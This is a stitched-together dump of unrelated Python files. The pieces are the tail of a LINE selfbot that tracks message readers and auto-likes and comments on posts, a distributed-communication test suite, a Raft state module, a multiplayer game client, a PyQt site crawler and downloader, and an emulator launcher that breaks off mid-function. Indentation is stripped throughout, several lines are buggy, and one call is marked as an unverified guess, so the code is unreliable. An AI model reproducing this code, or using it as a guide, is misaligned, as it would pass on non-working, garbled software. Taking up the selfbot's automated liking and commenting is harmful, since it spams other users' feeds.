read['readMember'][op.param1] += op.param2
read['ROM'][op.param1][op.param2] = op.param2
backupData()
else:
pass
except:
pass
#==============================================================================#
if op.type == 55:
            if op.param1 in cctv['point'] and cctv['cyduk'].get(op.param1) == True:
Name = line.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n☛ " + Name
summon(op.param1,[op.param2])
line.sendMessage(op.param1,settings["mention"])
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
line.sendImageWithURL(op.param1, image)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
line.sendMessage(msg.to, "[̟]: " + data['result']['response'].encode('utf-8'))
except Exception as error:
logError(error)
#==============================================================================#
def autolike():
count = 1
while True:
try:
for posts in line.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
line.likePost(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print ("Like")
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
line.createComment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def autoLike():
count = 1
while True:
try:
# iterate recent feed posts; the getFeed call and key layout follow the commented-out
# line that used to be here and the autolike() helper above (assumed, not verified against the API)
for posts in cl.getFeed(postLimit=10, commentLimit=1, likeLimit=1, order='TIME')["result"]["feed"]:
    if posts["postInfo"]["liked"] is False:
        if wait["sukaPost"] == True:
            line.likePost(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], likeType=1001)
            print ("Like")
        if wait["commentOn"] == True:
            if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
                pass
            else:
                line.createComment(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
def autoLiked():
#if settings["sukaPost"] == True:
lastTimeLiking = time.time()
if time.time() - lastTimeLiking >= 60*60:
listLikeType = 1001
myComment = "[ Auto Like by: Team Dkz Protection ]"
feed = line.getFeed()
if feed["message"] != 'succes':
lastTimeLiking = time.time()
return True
del feed["result"]["feedInfos"]
result = ["result"]["feeds"]
for res in result:
postInfo = res["post"]["postInfo"]
homeId = postInfo["homeId"]
postId = postInfo["postId"]
likeStat = postInfo["liked"]
if likeStat == True:
continue
else:
line.likePost(homeId, postId, listLikeType)
line.createComment(homeId, postId, myComment)
lastTimeLiking = time.time()
thread1 = threading.Thread(target=autoLike)
thread1.daemon = True
thread1.start()
while True:
try:
Ops = line.poll.fetchOperations(line.revision, 50)
for op in Ops:
if op.type != 0:
line.revision = max(line.revision, op.revision)
lineBot(op)
except Exception as E:
E = str(E)
if "reason=None" in E:
print (E)
time.sleep(60)
restart_program()
|
test_communicator.py
|
import unittest
import torch
import os
from bagua.torch_api.communication import (
_get_default_group,
allreduce,
allreduce_inplace,
send,
recv,
allgather,
barrier,
broadcast_object,
reduce,
reduce_inplace,
reduce_scatter,
reduce_scatter_inplace,
ReduceOp,
)
from tests.internal.common_utils import find_free_port
import multiprocessing
import bagua.torch_api as bagua
import threading
import time
from tests import skip_if_cuda_not_available
class Result(object):
def __init__(self):
self.ret = torch.Tensor([False]).bool()
self.data = torch.Tensor([0.0])
def init_env(rank, env):
os.environ["WORLD_SIZE"] = env["WORLD_SIZE"]
os.environ["LOCAL_WORLD_SIZE"] = env["LOCAL_WORLD_SIZE"]
os.environ["MASTER_ADDR"] = env["MASTER_ADDR"]
os.environ["MASTER_PORT"] = env["MASTER_PORT"]
os.environ["BAGUA_SERVICE_PORT"] = env["BAGUA_SERVICE_PORT"]
os.environ["RANK"] = str(rank)
os.environ["LOCAL_RANK"] = str(rank)
# init bagua distributed process group
torch.cuda.set_device(rank)
bagua.init_process_group()
def run_abort(rank, nprocs, results, env):
init_env(rank, env)
os.environ["NCCL_PROTO"] = "^LL128"
comm_stream = torch.cuda.Stream()
comm = _get_default_group().get_global_communicator()
def abort():
time.sleep(10)
comm.abort()
threading.Thread(target=abort).start()
with torch.cuda.stream(comm_stream):
data = torch.rand(10).cuda()
for _ in range(rank + 1):
comm.allreduce_inplace(
data.ensure_bagua_tensor().bagua_backend_tensor(), ReduceOp.AVG
)
comm_stream.synchronize()
def run_allreduce(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
tensor = send_tensor.clone()
allreduce(send_tensor, recv_tensor)
torch.distributed.all_reduce(tensor)
results[rank].ret[0] = torch.equal(recv_tensor, tensor)
def run_p2p(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
if rank % 2 == 0:
send(send_tensor, dst=(rank + 1) % nprocs)
results[rank].data.copy_(torch.norm(send_tensor))
else:
recv(recv_tensor, src=(rank - 1 + nprocs) % nprocs)
results[rank].data.copy_(torch.norm(recv_tensor))
def run_allgather(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros(
[nprocs, 100], device=send_tensor.device, dtype=send_tensor.dtype
)
tensor = send_tensor.clone()
tensor_list = [torch.zeros_like(tensor) for _ in range(nprocs)]
allgather(send_tensor, recv_tensor)
torch.distributed.all_gather(tensor_list, tensor)
ret = True
for i in range(nprocs):
ret = ret and torch.equal(recv_tensor[i], tensor_list[i])
results[rank].ret[0] = ret
def run_barrier(rank, nprocs, results, env):
init_env(rank, env)
barrier()
def run_bcastobject(rank, nprocs, results, env):
init_env(rank, env)
if rank == 0:
state_dict = {"lr": 0.02, "weight_decay": 1e-4, "momentum": 0.9}
else:
state_dict = {}
state_dict = broadcast_object(state_dict, 0)
ret = True
for i in range(nprocs):
ret = (
state_dict["lr"] == 0.02
and state_dict["weight_decay"] == 1e-4
and state_dict["momentum"] == 0.9
)
results[rank].ret[0] = ret
def run_avg(rank, nprocs, results, env):
init_env(rank, env)
def reduce_fn(send_tensor, recv_tensor, op):
reduce(send_tensor, recv_tensor, 0, op)
def reduce_inplace_fn(tensor, op):
reduce_inplace(tensor, 0, op)
fns = [reduce_fn, allreduce]
inplace_fns = [reduce_inplace_fn, allreduce_inplace]
succ = True
for fn in fns:
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
send_tensor_clone = send_tensor.clone().detach()
recv_tensor_clone = recv_tensor.clone().detach()
fn(send_tensor, recv_tensor, op=ReduceOp.AVG)
fn(send_tensor_clone, recv_tensor_clone, op=ReduceOp.SUM)
recv_tensor_clone /= nprocs
torch.cuda.synchronize()
succ = succ and torch.equal(recv_tensor, recv_tensor_clone)
for fn in inplace_fns:
tensor = torch.rand(100).cuda()
tensor_clone = tensor.clone().detach()
fn(tensor, op=ReduceOp.AVG)
fn(tensor_clone, op=ReduceOp.SUM)
tensor_clone /= nprocs
torch.cuda.synchronize()
succ = succ and torch.equal(tensor, tensor_clone)
results[rank].ret[0] = succ
def run_reduce_scatter(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100 * nprocs).cuda()
recv_tensor = torch.rand(100).cuda()
send_tensor_clone = send_tensor.clone().detach()
recv_tensor_clone = recv_tensor.clone().detach()
reduce_scatter(send_tensor, recv_tensor, op=ReduceOp.AVG)
reduce_scatter(send_tensor_clone, recv_tensor_clone, op=ReduceOp.SUM)
recv_tensor_clone /= nprocs
tensor = torch.rand(100 * nprocs).cuda()
tensor_clone = tensor.clone().detach()
reduce_scatter_inplace(tensor, op=ReduceOp.AVG)
reduce_scatter_inplace(tensor_clone, op=ReduceOp.SUM)
tensor_clone /= nprocs
torch.cuda.synchronize()
results[rank].ret[0] = torch.equal(recv_tensor, recv_tensor_clone) and torch.equal(
tensor, tensor_clone
)
class TestCommunication(unittest.TestCase):
def run_test_locally(self, fn):
nprocs = torch.cuda.device_count()
env = {
"WORLD_SIZE": str(nprocs),
"LOCAL_WORLD_SIZE": str(nprocs),
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(find_free_port(8000, 8100)),
"BAGUA_SERVICE_PORT": str(find_free_port(9000, 9100)),
}
mp = multiprocessing.get_context("spawn")
results = [Result() for _ in range(nprocs)]
processes = []
for i in range(nprocs):
p = mp.Process(
target=fn,
args=(i, nprocs, results, env),
)
p.start()
processes.append(p)
for p in processes:
p.join(timeout=60)
self.assertTrue(p.exitcode == 0)
return results
@skip_if_cuda_not_available()
def test_abort(self):
self.run_test_locally(run_abort)
@skip_if_cuda_not_available()
def test_allreduce(self):
results = self.run_test_locally(run_allreduce)
for ret in results:
self.assertTrue(ret.ret.item())
@skip_if_cuda_not_available()
def test_p2p(self):
results = self.run_test_locally(run_p2p)
i = 1
while i < len(results):
self.assertTrue(torch.equal(results[i].data, results[i - 1].data))
i += 2
@skip_if_cuda_not_available()
def test_allgather(self):
results = self.run_test_locally(run_allgather)
for ret in results:
self.assertTrue(ret.ret.item())
@skip_if_cuda_not_available()
def test_barrier(self):
self.run_test_locally(run_barrier)
@skip_if_cuda_not_available()
def test_bcastobject(self):
self.run_test_locally(run_bcastobject)
@skip_if_cuda_not_available()
def test_avg(self):
self.run_test_locally(run_avg)
@skip_if_cuda_not_available()
def test_reduce_scatter(self):
self.run_test_locally(run_reduce_scatter)
if __name__ == "__main__":
unittest.main()
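# A hedged note on running this file: executing it directly (python test_communicator.py)
# invokes unittest.main() above; judging by the decorator name, each test is skipped unless
# CUDA devices are visible, and run_test_locally() spawns one worker process per visible GPU.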
|
state.py
|
import random
from abc import ABC
from functools import reduce
from threading import Thread, Event
HEARTBEAT_TIMEOUT = 0.01
ELECTION_TIMEOUT = 0.5, 1.0
class State(ABC):
def __init__(self, server):
from server import SurfstoreServer
self.server: SurfstoreServer = server
self.majority = self.server.num_servers // 2 + 1
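# e.g. with num_servers == 5 this evaluates to 5 // 2 + 1 == 3, a strict majority of the cluster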
self.stop_event = Event()
def stop(self):
self.stop_event.set()
def on_AppendEntries(self):
pass
def on_RequestVote(self):
pass
class Follower(State):
def __init__(self, server):
super().__init__(server)
self.received_response = False  # Locked by self.server.lock
Thread(target=self.convert_to_candidate, daemon=True).start()
@property
def timeout(self):
return random.uniform(ELECTION_TIMEOUT[0], ELECTION_TIMEOUT[1])
def convert_to_candidate(self):
while not self.stop_event.wait(self.timeout):
with self.server.lock:
if not self.received_response:
print(
f'{self.server.id} {self.server.current_term} {self} convert_to_candidate(): become candidate')
self.server.transit_state(Candidate)
break
self.received_response = False
def on_AppendEntries(self):
self.received_response = True
def on_RequestVote(self):
self.received_response = True
def __repr__(self):
return "Follower"
class Candidate(State):
def __init__(self, server):
super().__init__(server)
Thread(target=self.elect_leader, daemon=True).start()
@property
def timeout(self):
return random.uniform(ELECTION_TIMEOUT[0], ELECTION_TIMEOUT[1])
def elect_leader(self):
while True:
# preempt response to AppendEntries and RequestVote
# no dead lock because we do not send RequestVote to self
# should work because if AppendEntries, RequestVote pending:
# 1. this round of election should fail
# 2. after this round of election, timer should be canceled
with self.server.lock:
self.server.current_term += 1
print(f'{self.server.id} {self.server.current_term} {self} elect_leader()')
# vote for self
self.server.voted_for = self.server.id
votes = 1
latest_term = self.server.current_term
for server_id, proxy in self.server.proxies.items():
try:
term, vote_granted = proxy.requestVote(self.server.current_term, self.server.id,
len(self.server.logs),
self.server.logs[-1][0] if self.server.logs else 0)
except OSError:
continue
latest_term = max(latest_term, term)
votes += vote_granted
if votes >= self.majority:
self.server.transit_state(Leader)
break
elif latest_term > self.server.current_term:
self.server.current_term = latest_term
self.server.voted_for = None
self.server.transit_state(Follower)
break
if self.stop_event.wait(self.timeout):
break
def __repr__(self):
return "Candidate"
class Leader(State):
def __init__(self, server):
super().__init__(server)
self.next_indexes = {server_id: len(self.server.logs) + 1
for server_id in server.proxies.keys() if server_id != server.id}
self.match_indexes = {server_id: 0 for server_id in server.proxies.keys() if server_id != server.id}
Thread(target=self.append_entry, daemon=True).start()
@property
def timeout(self):
return HEARTBEAT_TIMEOUT
def append_entry(self):
while True:
entries = {server_id: [] for server_id in self.next_indexes.keys()}
with self.server.lock:
for server_id, next_index in self.next_indexes.items():
# if last log index >= next_index for a follower, call appendEntry RPC
if len(self.server.logs) >= next_index:
entries[server_id] = self.server.logs[next_index - 1:]
latest_term = self.server.current_term
num_up = 1 # count self
for server_id, proxy in self.server.proxies.items():
prev_index = self.next_indexes[server_id] - 1
prev_term = self.server.logs[prev_index - 1][0] if prev_index else 0
try:
term, successful = proxy.appendEntries(self.server.current_term, prev_index, prev_term,
entries[server_id], self.server.commit_index)
except OSError:
continue
latest_term = max(latest_term, term)
# update indexes if succeed, else decrement next_index then retry
if successful:
self.next_indexes[server_id] = len(self.server.logs) + 1
self.match_indexes[server_id] = len(self.server.logs)
num_up += 1
elif term != -1:
self.next_indexes[server_id] -= 1
num_up += 1
self.server.num_up = num_up
# update commit_index if a log is replicated on majority of servers and is in self.currentTerm
for follower_commit in range(max(self.match_indexes.values()), self.server.commit_index, -1):
num = reduce(lambda n, match_index: n + (follower_commit <= match_index),
self.match_indexes.values(), 0)
# leader already append entry, num >= self.majority - 1 is enough
if num >= self.majority - 1 and self.server.logs[follower_commit - 1][0] == self.server.current_term:
self.server.commit_index = follower_commit
break
if latest_term > self.server.current_term:
self.server.current_term = latest_term
self.server.transit_state(Follower)
break
if self.stop_event.wait(self.timeout):
break
def __repr__(self):
return "Leader"
|
client03-empty.py
|
import copy
import logging
import asyncio
import threading
import time
from collections import deque
from dataclasses import asdict
from typing import Dict
import zmq
from zmq.asyncio import Context, Socket
import arcade
from pymunk.vec2d import Vec2d
from demos.movement import KeysPressed, MOVE_MAP, apply_movement
from .lib02 import PlayerEvent, PlayerState, GameState
logger = logging.getLogger(__name__)
logger.setLevel('INFO')
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
RECT_WIDTH = 50
RECT_HEIGHT = 50
MOVEMENT_SPEED = 5
UPDATE_TICK = 30
class Rectangle:
def __init__(self, x, y, color, filled=True):
self.position = Vec2d(x, y)
self.color = color
self.filled = filled
def draw(self):
if self.filled:
arcade.draw_rectangle_filled(self.position.x, self.position.y, 50, 50, self.color)
else:
arcade.draw_rectangle_outline(self.position.x, self.position.y, 50, 50, self.color, border_width=4)
class MyGame(arcade.Window):
def __init__(self, width, height):
super().__init__(width, height, title="Multiplayer Demo")
arcade.set_background_color(arcade.color.GRAY)
self.game_state = GameState(player_states=[PlayerState()])
self.player = Rectangle(0, 0, arcade.color.GREEN_YELLOW, filled=False)
self.player_input = PlayerEvent()
def update(self, dt):
pass
def on_draw(self):
arcade.start_render()
self.player.draw()
def on_key_press(self, key, modifiers):
self.player_input.keys[key] = True
def on_key_release(self, key, modifiers):
self.player_input.keys[key] = False
async def iomain(window: MyGame, loop):
ctx = Context()
sub_sock: Socket = ctx.socket(zmq.SUB)
sub_sock.connect('tcp://localhost:25000')
sub_sock.subscribe('')  # Required for PUB/SUB: a SUB socket receives nothing until it subscribes ('' = all topics)
push_sock: Socket = ctx.socket(zmq.PUSH)
push_sock.connect('tcp://localhost:25001')
async def send_player_input():
""" Task A """
while True:
d = asdict(window.player_input)
msg = dict(event=d)
await push_sock.send_json(msg)
await asyncio.sleep(1 / UPDATE_TICK)
async def receive_game_state():
""" Task B """
while True:
gs_string = await sub_sock.recv_string()
window.game_state.from_json(gs_string)
ps = window.game_state.player_states[0]
window.player.position = Vec2d(ps.x, ps.y)
try:
await asyncio.gather(send_player_input(), receive_game_state())
finally:
sub_sock.close(1)
push_sock.close(1)
ctx.destroy(linger=1)
def thread_worker(window: MyGame):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.create_task(iomain(window, loop))
loop.run_forever()
def main():
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
thread = threading.Thread(
target=thread_worker, args=(window,), daemon=True)
thread.start()
arcade.run()
if __name__ == "__main__":
main()
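# A hedged sketch of the server side this client assumes (not part of this file): the
# socket types and ports are inferred from the connect() calls in iomain() above, i.e. a
# PUB socket bound on 25000 broadcasting game state and a PULL socket bound on 25001
# collecting player events.
#
# import zmq
# ctx = zmq.Context()
# pub = ctx.socket(zmq.PUB)
# pub.bind('tcp://*:25000')
# pull = ctx.socket(zmq.PULL)
# pull.bind('tcp://*:25001')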
|
main.py
|
from gui.uis.windows.main_window.functions_main_window import *
import sys,os,time
import requests,json
import random
from bs4 import BeautifulSoup as bs4
from qt_core import *
from gui.core.json_settings import Settings
from gui.uis.windows.main_window import *
# IMPORT PY ONE DARK WIDGETS
from gui.widgets import *
import threading,queue
from urllib import request,parse
# ADJUST QT FONT DPI FOR HIGH-DPI AND 4K MONITORS
os.environ["QT_FONT_DPI"] = "96"
#IF IS 4K MONITOR ENABLE
#os.environ["QT_SCALE_FACTOR"] = "2"
# MAIN WINDOW
class MainWindow(QMainWindow):
def selectDirectory(self):
selected_directory = QFileDialog.getExistingDirectory()
self.line_edit3.setText(selected_directory)
def openDirectory(self):
basepath=self.line_edit3.text()
os.startfile(basepath)
def __init__(self):
super().__init__()
# SETUP MAIN WINDOW
# Load widgets from "gui\uis\main_window\ui_main.py"
self.ui = UI_MainWindow()
self.ui.setup_ui(self)
# LOAD SETTINGS
settings = Settings()
self.settings = settings.items
# SETUP MAIN WINDOW
self.hide_grips = True # Show/Hide resize grips
SetupMainWindow.setup_gui(self)
# SHOW MAIN WINDOW
self.show()
# LEFT MENU BTN IS CLICKED
# Run function when btn is clicked
# Check function by object name / btn_id
def msg(self,title,content):
# Message box
QMessageBox.critical(self,title,content,QMessageBox.Ok,QMessageBox.Ok)
def downfile(self,req):
pass
def download(self,data, headers={}, interval=0.5):
basepath=self.line_edit3.text().replace('\\','/')
def MB(byte):
return round(byte / 1024 / 1024, 2)
row=data[0]
cir1=data[1]
name=data[2]
url=data[3]
path=data[4]
fullpath=basepath+path
if not fullpath.endswith('/'):
fullpath=fullpath+'/'
try:
os.makedirs(fullpath)
except:
pass
self.table_widget.setItem(row,3,QTableWidgetItem('Downloading'))
self.ui.credits.copyright_label.setText('下载:'+name)
header={'Proxy-Connection': 'keep-alive'}
res = requests.get(url, stream=True, headers=header)
file_size = int(res.headers['content-length']) # total file size in bytes
f = open(fullpath+name, 'wb')
down_size = 0 # bytes downloaded so far
old_down_size = 0 # bytes downloaded at the previous progress update
time_ = time.time()
self.circular_progress_1.set_value(cir1)
for chunk in res.iter_content(chunk_size=512):
if chunk:
f.write(chunk)
down_size += len(chunk)
if time.time() - time_ > interval:
# rate = down_size / file_size * 100 # progress, percent
speed = (down_size - old_down_size) / interval # average speed over the interval, bytes per second
old_down_size = down_size
time_ = time.time()
print_params = [MB(speed), MB(down_size), MB(file_size), (file_size - down_size) / speed]
cir2=int(down_size/file_size*100)
self.circular_progress_2.set_value(cir2)
cir3=MB(speed)
self.circular_progress_3.set_value(cir3)
self.ui.credits.copyright_label.setText('开始下载'+name)
#print('\r{:.1f}MB/s - {:.1f}MB of {:.1f}MB, {:.0f} s remaining'.format(*print_params), end='')
f.close()
self.circular_progress_2.set_value(100)
self.table_widget.setItem(row,3,QTableWidgetItem('Complete'))
self.ui.credits.copyright_label.setText('完成')
def dumpThread(self,baseurl,hosturl):
page_urls=[baseurl]
_fileext=self.line_edit2.text()
if _fileext=='':
limfile=False
else:
limfile=True
fileext = _fileext.split('.')
if '' in fileext:
    fileext.remove('')
for now_url in page_urls:
self.ui.credits.copyright_label.setText('正在解析:'+now_url)
response = requests.get(now_url)
soup = bs4(response.text, "html.parser")
a_tags = soup.find_all('a')
for tag in a_tags:
#self.circular_progress_1.set_value(random.randint(1,90))
#self.circular_progress_2.set_value(random.randint(1,90))
#self.circular_progress_3.set_value(random.randint(1,90))
href=tag.get('href','')
title=tag.get('title')
if href=='/' or href=='' or href.startswith('https://') or href.startswith('http://'):
continue
if href.startswith('/'):
fullurl=hosturl+href
else:
fullurl=baseurl+href
if fullurl in page_urls or fullurl==hosturl:
continue
_req=request.urlopen(fullurl)
if 'text/html' in (_req.info().get('Content-Type') or ''):
page_urls.append(fullurl)
else:
need=True
if limfile:
need=False
for x in fileext:
if href.endswith(x):
need=True
if need!=True:
continue
row_number = self.table_widget.rowCount()
self.table_widget.insertRow(row_number) # Insert row
self.table_widget.setItem(row_number, 0, QTableWidgetItem(title)) # Add title
self.table_widget.setItem(row_number, 1, QTableWidgetItem(fullurl)) # Add URL
_path=parse.urlparse(fullurl).path
_path=_path.split('/')
_path='/'.join(_path[0:-1])
self.table_widget.setItem(row_number, 2, QTableWidgetItem(parse.unquote(_path))) # Add path
self.table_widget.setItem(row_number, 3, QTableWidgetItem('Pending')) # Add status
self.table_widget.setCurrentCell(row_number,0)
self.ui.credits.copyright_label.setText('抓取完成,开始下载')
row_number = self.table_widget.rowCount()
col_number = self.table_widget.columnCount()
for x in range(row_number):
cir1=int(x/row_number*100)
parms=[x,cir1]
for y in range(col_number):
parms.append(self.table_widget.item(x,y).text())
self.table_widget.setCurrentCell(x,0)
self.download(parms)
self.circular_progress_1.set_value(100)
def start_download(self):
url=self.line_edit.text()
url_parse=parse.urlparse(url)
if url_parse.netloc and url_parse.scheme:
hosturl="://".join([url_parse.scheme,url_parse.netloc])
baseurl=hosturl+url_parse.path
if not baseurl.endswith('/'):
baseurl=baseurl+'/'
t1 = threading.Thread(target=self.dumpThread,args=[baseurl,hosturl])
t1.start()
else:
self.msg('URL错误','请输入正确的URL并重试')
def clear(self):
self.table_widget.clearContents()
row_number = self.table_widget.rowCount()
for x in range(row_number):
self.table_widget.removeRow(0)
def btn_clicked(self):
# GET BT CLICKED
btn = SetupMainWindow.setup_btns(self)
# Remove Selection If Clicked By "btn_close_left_column"
if btn.objectName() != "btn_settings":
self.ui.left_menu.deselect_all_tab()
# Get Title Bar Btn And Reset Active
top_settings = MainFunctions.get_title_bar_btn(self, "btn_top_settings")
top_settings.set_active(False)
# LEFT MENU
# ///////////////////////////////////////////////////////////////
# HOME BTN
if btn.objectName() == "btn_home":
# Select Menu
self.ui.left_menu.select_only_one(btn.objectName())
# Load Page 1
MainFunctions.set_page(self, self.ui.load_pages.page_1)
# WIDGETS BTN
if btn.objectName() == "btn_widgets":
# Select Menu
self.ui.left_menu.select_only_one(btn.objectName())
# Load Page 2
MainFunctions.set_page(self, self.ui.load_pages.page_2)
# LOAD USER PAGE
if btn.objectName() == "btn_add_user":
# Select Menu
self.ui.left_menu.select_only_one(btn.objectName())
# Load Page 3
MainFunctions.set_page(self, self.ui.load_pages.page_3)
# BOTTOM INFORMATION
if btn.objectName() == "btn_info":
# CHECK IF LEFT COLUMN IS VISIBLE
if not MainFunctions.left_column_is_visible(self):
self.ui.left_menu.select_only_one_tab(btn.objectName())
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
else:
if btn.objectName() == "btn_close_left_column":
self.ui.left_menu.deselect_all_tab()
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
# Change Left Column Menu
if btn.objectName() != "btn_close_left_column":
MainFunctions.set_left_column_menu(
self,
menu = self.ui.left_column.menus.menu_2,
title = "Info tab",
icon_path = Functions.set_svg_icon("icon_info.svg")
)
# SETTINGS LEFT
if btn.objectName() == "btn_settings" or btn.objectName() == "btn_close_left_column":
# CHECK IF LEFT COLUMN IS VISIBLE
if not MainFunctions.left_column_is_visible(self):
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
else:
if btn.objectName() == "btn_close_left_column":
self.ui.left_menu.deselect_all_tab()
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
# Change Left Column Menu
if btn.objectName() != "btn_close_left_column":
MainFunctions.set_left_column_menu(
self,
menu = self.ui.left_column.menus.menu_1,
title = "Settings Left Column",
icon_path = Functions.set_svg_icon("icon_settings.svg")
)
# SETTINGS TITLE BAR
if btn.objectName() == "btn_top_settings":
# Toggle Active
if not MainFunctions.right_column_is_visible(self):
btn.set_active(True)
# Show / Hide
MainFunctions.toggle_right_column(self)
else:
btn.set_active(False)
# Show / Hide
MainFunctions.toggle_right_column(self)
# Get Left Menu Btn
top_settings = MainFunctions.get_left_menu_btn(self, "btn_settings")
top_settings.set_active_tab(False)
# DEBUG
print(f"Button {btn.objectName()}, clicked!")
# LEFT MENU BTN IS RELEASED
# Run function when btn is released
# Check function by object name / btn_id
def btn_released(self):
# GET BT CLICKED
btn = SetupMainWindow.setup_btns(self)
# DEBUG
print(f"Button {btn.objectName()}, released!")
# RESIZE EVENT
def resizeEvent(self, event):
SetupMainWindow.resize_grips(self)
# MOUSE CLICK EVENTS
def mousePressEvent(self, event):
# SET DRAG POS WINDOW
self.dragPos = event.globalPos()
# SETTINGS WHEN TO START
if __name__ == "__main__":
# APPLICATION
app = QApplication(sys.argv)
app.setWindowIcon(QIcon("icon.ico"))
window = MainWindow()
# EXEC APP
sys.exit(app.exec())
|
emulators.py
|
import sys
import time
from contextlib import suppress
import asyncio
import logging
import os
import subprocess
from dataclasses import dataclass
from multiprocessing import Queue, Process
from pathlib import Path
from typing import Optional, List, Dict, Any, Set, Union, Coroutine, Tuple, Mapping
from mobiletestorchestrator.device import Device
__all__ = ["EmulatorBundleConfiguration", "Emulator"]
log = logging.getLogger(str(Path(__file__).stem))
@dataclass
class EmulatorBundleConfiguration:
"""Path to SDK (must contain platform-tools and emulator dirs)"""
sdk: Path
"""Location of AVDs, or None for default"""
avd_dir: Optional[Path] = None
"""Location of system image or None for default"""
system_img: Optional[Path] = None
"""Location of kernal to use or None for default"""
kernel: Optional[Path] = None
"""location of RAM disk or None for default"""
ramdisk: Optional[Path] = None
"""which working directory to this before startup (or None to use cwd)"""
working_dir: Optional[Path] = None
"""timeout if boot does not happen after this many seconds"""
boot_timeout: int = 5*60
def adb_path(self) -> Path:
if sys.platform == 'win32':
return self.sdk.joinpath("platform-tools").joinpath("adb.exe")
else:
return self.sdk.joinpath("platform-tools").joinpath("adb")
def launch_cmd(self, avd: str, port: int, args: Optional[List[str]] = None) -> List[str]:
if sys.platform == 'win32':
emulator_cmd = self.sdk.joinpath("emulator").joinpath("emulator.exe")
else:
emulator_cmd = self.sdk.joinpath("emulator").joinpath("emulator")
if not emulator_cmd.is_file():
raise Exception(f"Could not find emulator cmd to launch emulator @ {emulator_cmd}")
if not self.adb_path().is_file():
raise Exception(f"Could not find adb cmd @ {self.adb_path()}")
cmd = [str(emulator_cmd), "-avd", avd, "-port", str(port), "-read-only"]
if self.system_img:
cmd += ["-system", str(self.system_img)]
if self.kernel:
cmd += ["-kernel", str(self.kernel)]
if self.ramdisk:
cmd += ["-ramdisk", str(self.ramdisk)]
if args:
cmd += args
return cmd
class Emulator(Device):
PORTS = list(range(5554, 5585, 2))
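# list(range(5554, 5585, 2)) yields the 16 even console ports 5554, 5556, ..., 5584;
# adb reaches each emulator on the odd port just above its console port (console + 1).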
_launches: Dict[str, Tuple[str, int, EmulatorBundleConfiguration, List[str], Mapping[str, str]]] = {}
class FailedBootError(Exception):
def __init__(self, port: int, stdout: str):
super().__init__(f"Failed to start emulator on port {port}:\n{stdout}")
self._port = port
@property
def port(self) -> int:
return self._port
def is_alive(self) -> bool:
return self.get_state(False) == Device.State.ONLINE
async def restart(self) -> None:
"""
Restart this emulator and make it available for use again
"""
if self._device_id not in Emulator._launches:
raise ValueError(f"Given device {self._device_id} was launched externally; "
"only emulators launched through 'Emulator.launch' can be relaunched ")
avd, port, config, args, env = Emulator._launches[self._device_id]
async def wait_for_boot() -> None:
subprocess.Popen(config.launch_cmd(port=port, avd=avd, args=args),
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=env)
booted = False
while await self.get_state(False) != Device.State.ONLINE:
await asyncio.sleep(1)
while not booted:
booted = self.get_system_property("sys.boot_completed") == "1"
await asyncio.sleep(1)
await asyncio.wait_for(wait_for_boot(), config.boot_timeout)
@classmethod
async def launch(cls, port: int, avd: str, config: EmulatorBundleConfiguration, *args: str) -> "Emulator":
"""
Launch an emulator on the given port, with named avd and configuration
:param port: which port to launch on
:param avd: name of emulator AVD
:param config: configuration of emulator
:param args: add'l arguments to pass to emulator command
"""
if port not in cls.PORTS:
raise ValueError(f"Port must be one of {cls.PORTS}")
device_id = f"emulator-{port}"
device = Device(device_id)
with suppress(Exception):
device.execute_remote_cmd("emu", "kill") # attempt to kill any existing emulator at this port
await asyncio.sleep(2)
if sys.platform == 'win32':
emulator_cmd = config.sdk.joinpath("emulator").joinpath("emulator.exe")
else:
emulator_cmd = config.sdk.joinpath("emulator").joinpath("emulator")
if not emulator_cmd.is_file():
raise Exception(f"Could not find emulator cmd to launch emulator @ {emulator_cmd}")
if not config.adb_path().is_file():
raise Exception(f"Could not find adb cmd @ {config.adb_path()}")
cmd = config.launch_cmd(avd=avd, port=port, args=list(args))
environ = dict(os.environ)
environ["ANDROID_AVD_HOME"] = str(config.avd_dir)
environ["ANDROID_SDK_HOME"] = str(config.sdk)
if sys.platform.lower() == 'win32':
environ["USERNAME"] = os.getlogin()
environ["USERPROFILE"] = f"C:\\Users\\{environ['USERNAME']}"
booted = False
proc = subprocess.Popen(
cmd,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=environ
)
try:
async def wait_for_boot() -> None:
nonlocal booted
